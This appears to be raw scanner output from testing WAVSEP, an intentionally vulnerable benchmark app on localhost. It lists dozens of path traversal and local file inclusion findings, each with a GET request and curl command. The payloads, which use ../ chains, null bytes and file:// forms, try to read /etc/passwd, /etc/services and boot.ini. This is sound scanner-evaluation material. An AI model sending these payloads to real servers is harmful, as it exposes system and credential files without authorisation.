Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fnone892j3kd.txt%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"
Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
